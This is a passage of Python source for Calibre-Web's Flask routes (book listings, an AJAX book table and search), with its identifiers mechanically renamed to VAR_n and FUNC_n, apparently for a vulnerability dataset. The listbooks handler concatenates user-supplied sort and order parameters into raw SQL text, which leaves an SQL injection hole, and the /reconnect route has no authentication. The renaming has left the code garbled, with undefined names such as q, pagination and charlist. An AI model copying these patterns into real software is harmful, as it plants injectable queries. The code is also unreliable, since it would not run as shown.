VAR_149=_(u"Rating: %(rating)s stars", rating=int(VAR_13.rating / 2)), VAR_9="ratings")
else:
abort(404)
def FUNC_24(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Data).filter(db.Data.format == VAR_5.upper()).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.data.any(db.Data.format == VAR_5.upper()),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
VAR_149=_(u"File format: %(format)s", format=VAR_13.format), VAR_9="formats")
else:
abort(404)
def FUNC_25(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Tags).filter(db.Tags.id == VAR_5).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.tags.any(db.Tags.id == VAR_5),
[VAR_10[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Category: %(VAR_13)s", VAR_13=VAR_13.name), VAR_9="category")
else:
abort(404)
def FUNC_26(VAR_9, VAR_13, VAR_10):
try:
VAR_106 = isoLanguages.get_language_name(get_locale(), VAR_13)
except KeyError:
abort(404)
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.languages.any(db.Languages.lang_code == VAR_13),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_13,
VAR_149=_(u"Language: %(VAR_13)s", VAR_13=VAR_106), VAR_9="language")
def FUNC_27(VAR_9, VAR_14, VAR_15=False, VAR_10=None):
VAR_10 = VAR_10 or []
if not config.config_read_column:
if VAR_14:
VAR_126 = and_(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
VAR_126 = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
VAR_126,
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
else:
try:
if VAR_14:
VAR_126 = db.cc_classes[config.config_read_column].value == True
else:
VAR_126 = coalesce(db.cc_classes[config.config_read_column].value, False) != True
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
VAR_126,
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
db.cc_classes[config.config_read_column])
except (KeyError, AttributeError):
VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
if not VAR_15:
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return redirect(url_for("web.index"))
if VAR_15:
return VAR_63, VAR_65
else:
if VAR_14:
VAR_13 = _(u'Read Books') + ' (' + str(VAR_65.total_count) + ')'
VAR_72 = "read"
else:
VAR_13 = _(u'Unread Books') + ' (' + str(VAR_65.total_count) + ')'
VAR_72 = "unread"
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_28(VAR_9, VAR_10):
VAR_10 = VAR_10 or []
VAR_69 = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.user_id == int(VAR_87.id))
.filter(ub.ArchivedBook.is_archived == True)
.all()
)
VAR_70 = [VAR_54.book_id for VAR_54 in VAR_69]
VAR_71 = db.Books.id.in_(VAR_70)
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage_with_archived_books(VAR_9, 0,
db.Books,
VAR_71,
VAR_10,
allow_show_archived=True)
VAR_13 = _(u'Archived Books') + ' (' + str(len(VAR_70)) + ')'
VAR_72 = "archived"
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_29(VAR_16):
VAR_41 = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
VAR_73 = calibre_db.session.query(db.Series)\
.join(db.books_series_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series'))\
.order_by(db.Series.name)\
.filter(calibre_db.common_filters()).all()
VAR_74 = ub.session.query(ub.Shelf)\
.filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(VAR_87.id)))\
.order_by(ub.Shelf.name).all()
VAR_75 = calibre_db.session.query(db.Data)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(db.Data.format)\
.order_by(db.Data.format).all()
if VAR_87.filter_language() == u"all":
VAR_48 = calibre_db.speaking_language()
else:
VAR_48 = None
return render_title_template('search_form.html', VAR_41=tags, VAR_48=languages, VAR_75=extensions,
VAR_73=series,VAR_74=shelves, VAR_149=_(u"Advanced Search"), VAR_16=cc, VAR_9="advsearch")
def FUNC_30(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
VAR_76 = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
VAR_63, VAR_77, VAR_65 = calibre_db.get_search_results(VAR_17, VAR_18, VAR_10, VAR_19, *VAR_76)
return render_title_template('search.html',
VAR_35=VAR_17,
VAR_65=pagination,
VAR_56=VAR_17,
adv_searchterm=VAR_17,
VAR_63=entries,
VAR_77=result_count,
VAR_149=_(u"Search"),
VAR_9="search")
@VAR_2.route("/", defaults={'page': 1})
@VAR_2.route('/VAR_9/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_31(VAR_9):
VAR_20 = (request.args.get('sort') or 'stored').lower()
return FUNC_15("newest", VAR_20, 1, VAR_9)
@VAR_2.route('/<VAR_8>/<VAR_20>', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>', defaults={'page': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_32(VAR_8, VAR_20, VAR_5, VAR_9):
return FUNC_15(VAR_8, VAR_20, VAR_5, VAR_9)
@VAR_2.route("/table")
@login_required
def FUNC_33():
VAR_78 = VAR_87.view_settings.get('table', {})
return render_title_template('book_table.html', VAR_149=_(u"Books List"), VAR_9="book_table",
visiblility=VAR_78)
@VAR_2.route("/ajax/listbooks")
@login_required
def FUNC_34():
VAR_79 = int(request.args.get("offset") or 0)
VAR_19 = int(request.args.get("limit") or config.config_books_per_page)
VAR_80 = request.args.get("search")
VAR_7 = request.args.get("sort", "id")
VAR_10 = request.args.get("order", "").lower()
VAR_81 = None
VAR_76 = tuple()
if VAR_7 == "state":
VAR_81 = json.loads(request.args.get("state", "[]"))
elif VAR_7 == "tags":
VAR_10 = [db.Tags.name.asc()] if VAR_10 == "asc" else [db.Tags.name.desc()]
VAR_76 = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
elif VAR_7 == "series":
VAR_10 = [db.Series.name.asc()] if VAR_10 == "asc" else [db.Series.name.desc()]
VAR_76 = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
elif VAR_7 == "publishers":
VAR_10 = [db.Publishers.name.asc()] if VAR_10 == "asc" else [db.Publishers.name.desc()]
VAR_76 = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
elif VAR_7 == "authors":
VAR_10 = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if VAR_10 == "asc" \
else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
VAR_76 = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
elif VAR_7 == "languages":
VAR_10 = [db.Languages.lang_code.asc()] if VAR_10 == "asc" else [db.Languages.lang_code.desc()]
VAR_76 = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
elif VAR_10 and VAR_7 in ["sort", "title", "authors_sort", "series_index"]:
VAR_10 = [text(VAR_7 + " " + VAR_10)]
elif not VAR_81:
VAR_10 = [db.Books.timestamp.desc()]
VAR_82 = VAR_83 = calibre_db.session.query(db.Books).count()
if VAR_81:
if VAR_80:
VAR_127 = calibre_db.search_query(VAR_80).all()
VAR_83 = len(VAR_127)
else:
VAR_127 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
VAR_63 = calibre_db.get_checkbox_sorted(VAR_127, VAR_81, VAR_79, VAR_19, VAR_10)
elif VAR_80:
VAR_63, VAR_83, VAR_64 = calibre_db.get_search_results(VAR_80, VAR_79, VAR_10, VAR_19, *VAR_76)
else:
VAR_63, VAR_64, VAR_64 = calibre_db.fill_indexpage((int(VAR_79) / (int(VAR_19)) + 1), VAR_19, db.Books, True, VAR_10, *VAR_76)
for entry in VAR_63:
for FUNC_31 in range(0, len(entry.languages)):
entry.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
FUNC_31].lang_code)
VAR_84 = {'totalNotFiltered': VAR_82, 'total': VAR_83, "rows": VAR_63}
VAR_85 = json.dumps(VAR_84, cls=db.AlchemyEncoder)
VAR_86 = make_response(VAR_85)
VAR_86.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_86
@VAR_2.route("/ajax/table_settings", methods=['POST'])
@login_required
def FUNC_35():
VAR_87.view_settings['table'] = json.loads(request.data)
try:
try:
flag_modified(VAR_87, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
VAR_3.error("Invalid request received: %r ", request, )
return "Invalid request", 400
return ""
@VAR_2.route("/author")
@login_required_if_no_ano
def FUNC_36():
if VAR_87.check_visibility(constants.SIDEBAR_AUTHOR):
if VAR_87.get_view_property('author', 'dir') == 'desc':
VAR_10 = db.Authors.sort.desc()
VAR_109 = 0
else:
VAR_10 = db.Authors.sort.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_authors_link.author')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
VAR_108 = copy.deepcopy(VAR_63)
for entry in VAR_108:
entry.Authors.name = entry.Authors.name.replace('|', ',')
return render_title_template('list.html', VAR_63=VAR_108, folder='web.books_list', VAR_107=charlist,
VAR_149=u"Authors", VAR_9="authorlist", VAR_8='author', VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/downloadlist")
@login_required_if_no_ano
def FUNC_37():
if VAR_87.get_view_property('download', 'dir') == 'desc':
VAR_10 = ub.User.name.desc()
VAR_109 = 0
else:
VAR_10 = ub.User.name.asc()
VAR_109 = 1
if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD) and VAR_87.role_admin():
VAR_63 = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
.join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(VAR_10).all()
VAR_107 = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
.group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Downloads"), VAR_9="downloadlist", VAR_8="download", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/publisher")
@login_required_if_no_ano
def FUNC_38():
if VAR_87.get_view_property('publisher', 'dir') == 'desc':
VAR_10 = db.Publishers.name.desc()
VAR_109 = 0
else:
VAR_10 = db.Publishers.name.asc()
VAR_109 = 1
if VAR_87.check_visibility(constants.SIDEBAR_PUBLISHER):
VAR_63 = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_publishers_link.publisher')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Publishers"), VAR_9="publisherlist", VAR_8="publisher", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/series")
@login_required_if_no_ano
def FUNC_39():
if VAR_87.check_visibility(constants.SIDEBAR_SERIES):
if VAR_87.get_view_property('series', 'dir') == 'desc':
VAR_10 = db.Series.sort.desc()
VAR_109 = 0
else:
VAR_10 = db.Series.sort.asc()
VAR_109 = 1
if VAR_87.get_view_property('series', 'series_view') == 'list':
VAR_63 = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series")
else:
VAR_63 = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
.join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('grid.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series", bodyClass="grid-view",
VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/ratings")
@login_required_if_no_ano
def FUNC_40():
if VAR_87.check_visibility(constants.SIDEBAR_RATING):
if VAR_87.get_view_property('ratings', 'dir') == 'desc':
VAR_10 = db.Ratings.rating.desc()
VAR_109 = 0
else:
VAR_10 = db.Ratings.rating.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
(db.Ratings.rating / 2).label('name')) \
.join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_ratings_link.rating')).order_by(VAR_10).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
VAR_149=_(u"Ratings list"), VAR_9="ratingslist", VAR_8="ratings", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/formats")
@login_required_if_no_ano
def FUNC_41():
if VAR_87.check_visibility(constants.SIDEBAR_FORMAT):
if VAR_87.get_view_property('ratings', 'dir') == 'desc':
VAR_10 = db.Data.format.desc()
VAR_109 = 0
else:
VAR_10 = db.Data.format.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Data,
func.count('data.book').label('count'),
db.Data.format.label('format')) \
.join(db.Books).filter(calibre_db.common_filters()) \
.group_by(db.Data.format).order_by(VAR_10).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
VAR_149=_(u"File formats list"), VAR_9="formatslist", VAR_8="formats", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/language")
@login_required_if_no_ano
def FUNC_42():
if VAR_87.check_visibility(constants.SIDEBAR_LANGUAGE):
VAR_107 = list()
if VAR_87.filter_language() == u"all":
VAR_48 = calibre_db.speaking_language()
else:
VAR_48 = calibre_db.session.query(db.Languages).filter(
db.Languages.lang_code == VAR_87.filter_language()).all()
VAR_48[0].name = isoLanguages.get_language_name(get_locale(), VAR_48[0].name.lang_code)
VAR_110 = calibre_db.session.query(db.books_languages_link,
func.count('books_languages_link.book').label('bookcount')).group_by(
text('books_languages_link.lang_code')).all()
return render_title_template('languages.html', VAR_48=languages, VAR_110=lang_counter,
VAR_107=charlist, VAR_149=_(u"Languages"), VAR_9="langlist",
VAR_8="language")
else:
abort(404)
@VAR_2.route("/category")
@login_required_if_no_ano
def FUNC_43():
if VAR_87.check_visibility(constants.SIDEBAR_CATEGORY):
if VAR_87.get_view_property('category', 'dir') == 'desc':
VAR_10 = db.Tags.name.desc()
VAR_109 = 0
else:
VAR_10 = db.Tags.name.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
.join(db.books_tags_link).join(db.Books).order_by(VAR_10).filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag')).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
.join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Categories"), VAR_9="catlist", VAR_8="category", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/tasks")
@login_required
def FUNC_44():
VAR_51 = WorkerThread.getInstance().tasks
VAR_88 = render_task_status(VAR_51)
return render_title_template('tasks.html', VAR_63=VAR_88, VAR_149=_(u"Tasks"), VAR_9="tasks")
@app.route("/reconnect")
def FUNC_45():
calibre_db.reconnect_db(config, ub.app_DB_path)
return json.dumps({})
@VAR_2.route("/search", methods=["GET"])
@login_required_if_no_ano
def VAR_80():
VAR_17 = request.args.get("query")
if VAR_17:
return redirect(url_for('web.books_list', VAR_8="search", VAR_20='stored', VAR_56=VAR_17))
else:
return render_title_template('search.html',
VAR_35="",
VAR_77=0,
VAR_149=_(u"Search"),
VAR_9="search")
@VAR_2.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def FUNC_47():
VAR_89 = dict(request.form)
VAR_90 = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie', 'include_shelf', 'exclude_shelf',
'include_language', 'exclude_language', 'include_extension', 'exclude_extension']
for VAR_111 in VAR_90:
VAR_89[VAR_111] = list(request.form.getlist(VAR_111))
VAR_91['query'] = json.dumps(VAR_89)
return redirect(url_for('web.books_list', VAR_8="advsearch", VAR_20='stored', VAR_56=""))
def FUNC_48(VAR_16, VAR_17, VAR_21):
for c in VAR_16:
if c.datatype == "datetime":
VAR_128 = VAR_17.get('custom_column_' + str(c.id) + '_start')
VAR_129 = VAR_17.get('custom_column_' + str(c.id) + '_end')
if VAR_128:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) >= func.datetime(VAR_128)))
if VAR_129:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) <= func.datetime(VAR_129)))
else:
VAR_130 = VAR_17.get('custom_column_' + str(c.id))
if VAR_130 != '' and VAR_130 is not None:
if c.datatype == 'bool':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == (VAR_130 == "True")))
elif c.datatype == 'int' or c.datatype == 'float':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == VAR_130))
elif c.datatype == 'rating':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == int(float(VAR_130) * 2)))
else:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.lower(db.cc_classes[c.id].value).ilike("%" + VAR_130 + "%")))
return VAR_21
def FUNC_49(VAR_21, VAR_22, VAR_23):
if VAR_87.filter_language() != "all":
VAR_21 = q.filter(db.Books.languages.any(db.Languages.lang_code == VAR_87.filter_language()))
else:
for language in VAR_22:
VAR_21 = q.filter(db.Books.languages.any(db.Languages.id == language))
for language in VAR_23:
VAR_21 = q.filter(not_(db.Books.series.any(db.Languages.id == language)))
return VAR_21
def FUNC_50(VAR_21, VAR_24, VAR_25):
if VAR_24:
VAR_24 = int(VAR_24) * 2
VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating <= VAR_24))
if VAR_25:
rating_low = int(VAR_25) * 2
VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating >= VAR_25))
return VAR_21
def FUNC_51(VAR_21, VAR_26):
if VAR_26:
if config.config_read_column:
try:
if VAR_26 == "True":
VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(db.cc_classes[config.config_read_column].value == True)
else:
VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
except (KeyError, AttributeError):
VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return VAR_21
else:
if VAR_26 == "True":
VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(VAR_87.id),
coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
return VAR_21
def FUNC_52(VAR_21, VAR_27, VAR_28):
for extension in VAR_27:
VAR_21 = q.filter(db.Books.data.any(db.Data.format == extension))
for extension in VAR_28:
VAR_21 = q.filter(not_(db.Books.data.any(db.Data.format == extension)))
return VAR_21
def FUNC_53(VAR_21, VAR_29, VAR_30):
for tag in VAR_29:
VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
for tag in VAR_30:
VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
return VAR_21
def FUNC_54(VAR_21, VAR_31, VAR_32):
for serie in VAR_31:
VAR_21 = q.filter(db.Books.series.any(db.Series.id == serie))
for serie in VAR_32:
VAR_21 = q.filter(not_(db.Books.series.any(db.Series.id == serie)))
return VAR_21
def FUNC_55(VAR_21, VAR_33, VAR_34):
VAR_21 = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
.filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(VAR_34)))
if len(VAR_33) > 0:
VAR_21 = q.filter(ub.BookShelf.shelf.in_(VAR_33))
return VAR_21
def FUNC_56(VAR_35,
VAR_36,
VAR_37,
VAR_38,
VAR_39,
VAR_40,
VAR_41,
VAR_24,
VAR_25,
VAR_26,
):
VAR_35.extend((VAR_36.replace('|', ','), VAR_37, VAR_38))
if VAR_39:
try:
VAR_35.extend([_(u"Published after ") +
format_date(datetime.strptime(VAR_39, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
VAR_39 = u""
if VAR_40:
try:
VAR_35.extend([_(u"Published before ") +
format_date(datetime.strptime(VAR_40, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
VAR_39 = u""
VAR_92 = {'tag': db.Tags, 'serie':db.Series, 'shelf':ub.Shelf}
for key, db_element in VAR_92.items():
VAR_112 = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['include_' + key])).all()
VAR_35.extend(tag.name for tag in VAR_112)
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['exclude_' + key])).all()
VAR_35.extend(tag.name for tag in VAR_112)
VAR_57 = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(VAR_41['include_language'])).all()
if VAR_57:
language_names = calibre_db.speaking_language(VAR_57)
VAR_35.extend(language.name for language in VAR_57)
VAR_57 = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(VAR_41['exclude_language'])).all()
if VAR_57:
language_names = calibre_db.speaking_language(VAR_57)
VAR_35.extend(language.name for language in VAR_57)
if VAR_24:
VAR_35.extend([_(u"Rating <= %(rating)s", rating=VAR_24)])
if VAR_25:
VAR_35.extend([_(u"Rating >= %(rating)s", rating=VAR_25)])
if VAR_26:
VAR_35.extend([_(u"Read Status = %(status)s", status=VAR_26)])
VAR_35.extend(ext for ext in VAR_41['include_extension'])
VAR_35.extend(ext for ext in VAR_41['exclude_extension'])
VAR_35 = " + ".join(filter(None, VAR_35))
return VAR_35, VAR_39, VAR_40
def FUNC_57(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
VAR_10 = VAR_10 or [db.Books.sort]
VAR_65 = None
VAR_16 = get_cc_columns(filter_config_custom_read=True)
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
VAR_21 = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
.outerjoin(db.Series)\
.filter(calibre_db.common_filters(True))
VAR_41 = dict()
VAR_92 = ['tag', 'serie', 'shelf', 'language', 'extension']
for VAR_113 in VAR_92:
VAR_41['include_' + VAR_113] = VAR_17.get('include_' + VAR_113)
VAR_41['exclude_' + VAR_113] = VAR_17.get('exclude_' + VAR_113)
VAR_36 = VAR_17.get("author_name")
VAR_37 = VAR_17.get("book_title")
VAR_38 = VAR_17.get("publisher")
VAR_39 = VAR_17.get("publishstart")
VAR_40 = VAR_17.get("publishend")
VAR_25 = VAR_17.get("ratinghigh")
VAR_24 = VAR_17.get("ratinglow")
VAR_93 = VAR_17.get("comment")
VAR_26 = VAR_17.get("read_status")
if VAR_36:
VAR_36 = VAR_36.strip().lower().replace(',', '|')
if VAR_37:
VAR_37 = VAR_37.strip().lower()
if VAR_38:
VAR_38 = VAR_38.strip().lower()
VAR_35 = []
VAR_94 = False
for c in VAR_16:
if c.datatype == "datetime":
VAR_131 = VAR_17.get('custom_column_' + str(c.id) + '_start')
VAR_132 = VAR_17.get('custom_column_' + str(c.id) + '_end')
if VAR_131:
VAR_35.extend([u"{} >= {}".format(c.name,
format_date(datetime.strptime(VAR_131, "%Y-%m-%d"),
format='medium',
locale=get_locale())
)])
VAR_94 = True
if VAR_132:
VAR_35.extend([u"{} <= {}".format(c.name,
format_date(datetime.strptime(VAR_132, "%Y-%m-%d").date(),
format='medium',
locale=get_locale())
)])
VAR_94 = True
elif VAR_17.get('custom_column_' + str(c.id)):
VAR_35.extend([(u"{}: {}".format(c.name, VAR_17.get('custom_column_' + str(c.id))))])
VAR_94 = True
if any(VAR_41.values()) or VAR_36 or VAR_37 or VAR_38 or VAR_39 or VAR_40 or VAR_25 \
or VAR_24 or VAR_93 or VAR_94 or VAR_26:
VAR_35, VAR_39, VAR_40 = FUNC_56(VAR_35,
VAR_36,
VAR_37,
VAR_38,
VAR_39,
VAR_40,
VAR_41,
VAR_24,
VAR_25,
VAR_26)
VAR_21 = q.filter()
if VAR_36:
VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_36 + "%")))
if VAR_37:
VAR_21 = q.filter(func.lower(db.Books.title).ilike("%" + VAR_37 + "%"))
if VAR_39:
VAR_21 = q.filter(func.datetime(db.Books.pubdate) > func.datetime(VAR_39))
if VAR_40:
VAR_21 = q.filter(func.datetime(db.Books.pubdate) < func.datetime(VAR_40))
VAR_21 = FUNC_51(VAR_21, VAR_26)
if VAR_38:
VAR_21 = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + VAR_38 + "%")))
VAR_21 = FUNC_53(VAR_21, VAR_41['include_tag'], VAR_41['exclude_tag'])
VAR_21 = FUNC_54(VAR_21, VAR_41['include_serie'], VAR_41['exclude_serie'])
VAR_21 = FUNC_55(VAR_21, VAR_41['include_shelf'], VAR_41['exclude_shelf'])
VAR_21 = FUNC_52(VAR_21, VAR_41['include_extension'], VAR_41['exclude_extension'])
VAR_21 = FUNC_49(VAR_21, VAR_41['include_language'], VAR_41['exclude_language'])
VAR_21 = FUNC_50(VAR_21, VAR_24, VAR_25)
if VAR_93:
VAR_21 = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + VAR_93 + "%")))
try:
VAR_21 = FUNC_48(VAR_16, VAR_17, VAR_21)
except AttributeError as ex:
VAR_3.debug_or_exception(ex)
flash(_("Error on VAR_80 for custom columns, please restart Calibre-Web"), category="error")
VAR_21 = q.order_by(*VAR_10).all()
VAR_91['query'] = json.dumps(VAR_17)
ub.store_ids(VAR_21)
VAR_77 = len(VAR_21)
if VAR_18 != None and VAR_19 != None:
VAR_18 = int(VAR_18)
VAR_114 = VAR_18 + int(VAR_19)
VAR_65 = Pagination((VAR_18 / (int(VAR_19)) + 1), VAR_19, VAR_77)
else:
VAR_18 = 0
VAR_114 = VAR_77
return render_title_template('search.html',
adv_searchterm=VAR_35,
VAR_65=pagination,
VAR_63=VAR_21[VAR_18:VAR_114],
VAR_77=result_count,
VAR_149=_(u"Advanced Search"), VAR_9="advsearch")
@VAR_2.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def FUNC_58():
